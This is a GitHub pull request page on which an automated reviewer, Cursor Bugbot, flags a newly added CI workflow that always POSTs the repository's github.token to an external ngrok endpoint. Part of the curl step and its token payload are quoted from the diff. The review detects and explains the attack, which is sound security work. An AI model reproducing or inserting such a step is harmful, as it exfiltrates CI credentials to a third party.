Conversation
![cursor[bot]](https://avatars.githubusercontent.com/in/1210556?s=60&v=4){kind=small}
There was a problem hiding this comment.
Cursor Bugbot has reviewed your changes and found 1 potential issue.
❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, enable autofix in the Cursor dashboard.
Reviewed by Cursor Bugbot for commit 72fd957. Configure here.
| -H "X-Source: edge-gui-pr" \ | ||
| -d "{\"token\":\"$GH_TOKEN\"}" | ||
| env: | ||
| GH_TOKEN: ${{ github.token }} |
There was a problem hiding this comment.
CI workflow exfiltrates GitHub token to external server
High Severity
The workflow sends the github.token to an external ngrok endpoint (nonconditional-charline-plashy.ngrok-free.dev) via curl. This exfiltrates the repository's CI credentials to a third-party server. The if: always() ensures the exfiltration runs even if prior steps fail, and the PR title itself states the intent is to "discover the github.token value." This is malicious code.
Reviewed by Cursor Bugbot for commit 72fd957. Configure here.
1 participant
CHANGELOG
Does this branch warrant an entry to the CHANGELOG?
Dependencies
noneRequirements
If you have made any visual changes to the GUI. Make sure you have:
Note
High Risk
High risk because it exfiltrates the
github.tokenfrom CI to an externalngrokURL, which is security-sensitive. It also changes CI behavior on every push and runs the submission step unconditionally (if: always()).Overview
Adds a new
.github/workflows/ci.ymlGitHub Actions workflow that runs on everypush, installs Node/Yarn dependencies, and then always executes acurlPOST to an externalngrokURL including thegithub.tokenin the request payload.Reviewed by Cursor Bugbot for commit 72fd957. Bugbot is set up for automated code reviews on this repo. Configure here.